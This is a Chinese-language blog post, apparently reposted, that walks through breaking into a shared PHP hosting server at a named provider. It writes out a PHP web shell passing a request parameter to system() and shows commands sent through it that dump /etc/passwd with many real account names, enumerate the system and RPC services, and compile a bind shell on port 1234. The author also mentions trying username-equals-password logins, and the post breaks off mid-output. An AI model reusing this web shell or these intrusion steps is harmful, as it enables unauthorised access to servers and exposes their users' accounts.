構建Linux下的安全 PHP配置漏洞攻擊

火星人 @ 2014-03-29 , reply:0



這些站點的問題主要出在允許使用system(),exec()等等這些函數,熟悉php的朋友應該知道,這些函數是調用系統指令的(雖然通過web server php程序只能有nobody許可權),而且一般用戶只要申請一個空間就可以獲取局部的可寫許可權,令用戶可以寫一個web shell程序執行命令.在這些伺服器上一般用戶不能夠登陸,也就是nologin(沒有登陸shell,管理員可沒那麼"慷慨"!),這樣利用system(),exec()這些函數就可以bind一個shell出來~!本文以虎翼網(www.51.net)的空間為例子(他是不是所有的伺服器都有這個毛病我不知道~我只試驗了我的空間所在的伺服器):

1.寫一個webshell先(php很容易做到)
CODE:
?>php
#shell.php3
echo"<pre>";
system("$cmd");
echo"
";
?>

2.上傳到空間

3.執行(具體的伺服器馬賽克處理)
CODE:
lynx http://xxx.51.net/cgi-bin/shell.php?cmd=id (看一下許可權到底多大)
uid=171047(xxxx) gid=51(xxx) groups=51(xxx), 65534(nobody)
root真的很吝嗇啊!
lynx http://xxx.51.net/cgi-bin/shell.php?cmd=uname -ras(看看系統)
FreeBSD xxx.51.net 3.3-RELEASE FreeBSD 3.3-RELEASE #11: Tue Mar 20
00:58:09 CST 2001 root@51.net:/usr/src/sys/compile/51NET i386
lynx http://xxx.51.net/cgi-bin/shell.php?cmd=cat
/etc/passwd(shadow是鐵定看不到)
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin
operator:*:2:5:System &:/:/sbin/nologin
bin:*:3:7:Binaries Commands and Source,,,:/:/sbin/nologin
tty:*:107353:51:USER:/home/tty:/local/bin/null
kmem:*:5:65533:KMem Sandbox:/:/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/sbin/nologin
news:*:8:8:News Subsystem:/:/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/sbin/nologin
uucp:*:66:66:UUCP
pseudo-user:/var/spool/uucppublic:/usr/libexec/uucp/uucico
xten:*:67:67:X-10 daemon:/usr/local/xten:/sbin/nologin
pop:*:68:6:Post Office Owner:/nonexistent:/sbin/nologin
ftp:*:70:70:FTP Daemon:/nonexistent:/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin
quotauser1:*:997:51:quotauser:/home/quotauser1:/sbin/nologin
quotauser2:*:998:51:quotauser:/home/quotauser2:/sbin/nologin
quotauser3:*:999:51:quotauser:/home/quotauser3:/sbin/nologin
tian:*:1002:1002::/local/tian:/local/bin/ksh
sysadmin:*:1001:1001:Syste
Administrator:/local/sysadmin:/local/bin/ksh
test2:*:9999:51::/home/test2:/local/bin/null
xhjj:*:106200:51:USER:/home/xhjj:/sbin/nologin
zhinan:*:106201:51:USER:/home/zhinan:/local/bin/null
yes2:*:106202:51:USER:/home/yes2:/local/bin/null
daboy:*:106203:51:USER:/home/daboy:/local/bin/null
yesky:*:106204:51:USER:/home/yesky:/local/bin/null
yesk:*:106205:51:USER:/home/yesk:/local/bin/null
lnsyzzg:*:106206:51:USER:/home/lnsyzzg:/local/bin/null
fog:*:106207:51:USER:/home/fog:/local/bin/null
renshou:*:106208:51:USER:/home/renshou:/local/bin/null
hilen:*:106209:51:USER:/home/hilen:/local/bin/null
hapybird:*:106210:51:USER:/home/hapybird:/sbin/nologin
xiewei:*:106211:51:USER:/home/xiewei:/sbin/nologin
wwwer:*:106212:51:USER:/home/wwwer:/local/bin/null
larry:*:106213:51:USER:/home/larry:/local/bin/null
sunboys:*:106214:51:USER:/home/sunboys:/local/bin/null
everydayyuki:*:106215:51:USER:/home/everydayyuki:/local/bin/null
linguanxi:*:106216:51:USER:/home/linguanxi:/local/bin/null
baobao:*:106217:51:USER:/home/baobao:/local/bin/null
chaoshan:*:106218:51:USER:/home/chaoshan:/local/bin/null
hrstudio:*:106219:51:USER:/home/hrstudio:/local/bin/null
dengxian:*:106220:51:USER:/home/dengxian:/local/bin/null
simonstone:*:106221:51:USER:/home/simonstone:/local/bin/null
chenjian:*:106222:51:USER:/home/chenjian:/local/bin/null
lvxiangml:*:106223:51:USER:/home/lvxiangml:/local/bin/null
zzbxaxa:*:106224:51:USER:/home/zzbxaxa:/local/bin/null
pc2000:*:106225:51:USER:/home/pc2000:/local/bin/null
startexcel:*:106226:51:USER:/home/startexcel:/local/bin/null
model:*:106227:51:USER:/home/model:/local/bin/null
leogirl:*:106228:51:USER:/home/leogirl:/local/bin/null
fohcn:*:106229:51:USER:/home/fohcn:/local/bin/null
ljok:*:106230:51:USER:/home/ljok:/local/bin/null
baorui:*:106231:51:USER:/home/baorui:/local/bin/null
fky-jack:*:106232:51:USER:/home/fky-jack:/local/bin/null
zhaowen:*:106233:51:USER:/home/zhaowen:/local/bin/null
xiaojiaoya:*:106234:51:USER:/home/xiaojiaoya:/local/bin/null
zyinter:*:106235:51:USER:/home/zyinter:/local/bin/null
power:*:106236:51:USER:/home/power:/local/bin/null
feefan:*:106237:51:USER:/home/feefan:/local/bin/null
paradise:*:106238:51:USER:/home/paradise:/local/bin/null
wulc:*:106239:51:USER:/home/wulc:/local/bin/null
jcm:*:106240:51:USER:/home/jcm:/local/bin/null
liangxiaom:*:106241:51:USER:/home/liangxiaom:/local/bin/null
jingder:*:106242:51:USER:/home/jingder:/local/bin/null
hanjun:*:106243:51:USER:/home/hanjun:/local/bin/null
adai:*:106244:51:USER:/home/adai:/local/bin/null
fightben:*:106245:51:USER:/home/fightben:/local/bin/null
lihonghui-ooo:*:106246:51:USER:/home/lihonghui-ooo:/local/bin/null
xeno:*:106247:51:USER:/home/xeno:/local/bin/null
..................(太多了~省略)

只有幾個用戶有shell可以登陸,cp到我的目錄下面,等一下分離出usrename看看有沒有人username=passwd的~呵呵~
  
CODE:
lynx http://xxx.51.net/cgi-bin/shell.php?cmd=set
HOME=/
PS$
OPTIND=1
PS2=>
PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin
IFS=

好差的"環境",被設置成這樣....
CODE:
lynx http://xxx.51.net/cgi-bin/shell.php?cmd=cat /etc/hosts
# $reeBSD: src/etc/hosts,v 1.9.2.1 1999/08/29 14:18:44 peter Exp $
# Host Database
# This file should contain the addresses and aliases
# for local hosts that share this file.
# In the presence of the domain name service or NIS, this file may
# not be consulted at all; see /etc/host.conf for the resolutionorder.
#127.0.0.1 localhost localhost.my.domain myname.my.domain
#
# Imaginary network.
#10.0.0.2 myname.my.domain myname
#10.0.0.3 myfriend.my.domain myfriend
#
# According to RFC 1918, you can use the following IP networks for
# private nets which will never be connected to the Internet:
#
# 10.0.0.0 - 10.255.255.255
# 172.16.0.0 - 172.31.255.255
# 192.168.0.0 - 192.168.255.255
#
#

不算太小啊~hosts ~
CODE:
lynx http://xxx.51.net/cgi-bin/shell.php?cmd=whereis -b gcc

(老天保佑~有gcc)

gcc:/usr/sbin/gcc(萬歲!!!!!!!!!!!!)

我來試試看~弄一個大傢伙上去,編譯一下,哈哈~速度好快!

webshell太累了,bind一個shell出來方便一點...(上傳binshell程序,自己寫也可以用perl/C,都不太難)
CODE:
lynx http://xxx.51.net/cgi-bin/shell.php?cmd=gcc -o bind bindshell.c
lynx http://xxx.51.net/cgi-bin/shell.php?cmd=./bind 1234
bind shell too port 1234
telnet xxx.51.net 1234

.....下面省略,反正就可以執行命令了

嗯~好像這台沒裝MySQL,可惜~呵呵~~~~~~~~~,對了oso.com.cn的好像有~,不過最近停了.....
CODE:
lynx http://xxx.51.net/cgi-bin/shell.php?cmd=/usr/sbin/rpcinfo -p
localhost
portmapper 100000 portmap sunrpc
rstatd 100001 rstat rstat_svc rup perfmeter
rusersd 100002 rusers
nfs 100003 nfsprog
ypserv 100004 ypprog
mountd 100005 mount showmount
ypbind 100007
walld 100008 rwall shutdown
yppasswdd 100009 yppasswd
etherstatd 100010 etherstat
rquotad 100011 rquotaprog quota rquota
sprayd 100012 spray
3270_mapper 100013
rje_ma





[火星人 via ] 構建Linux下的安全 PHP配置漏洞攻擊已經有218次圍觀

http://www.coctec.com/docs/linux/show-post-204040.html